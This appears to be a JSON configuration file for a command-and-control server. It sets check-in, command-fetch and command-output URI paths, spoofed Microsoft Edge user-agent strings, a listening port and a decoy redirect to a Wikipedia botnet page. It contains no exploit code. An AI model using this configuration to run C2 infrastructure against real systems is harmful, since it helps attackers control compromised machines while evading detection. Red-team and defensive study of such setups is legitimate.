{"ns_init_suri": "/init/comms", "ns_init_surip": "/init/comms/post", "ns_fof_suri": "/fof/commands", "ns_post_suri": "/command/output", "ns_get_ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.68", "ns_post_ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.68", "ns_aiohttp_lp": 8080, "ns_redirect_url": "https://en.wikipedia.org/wiki/Botnet#Command_and_control"}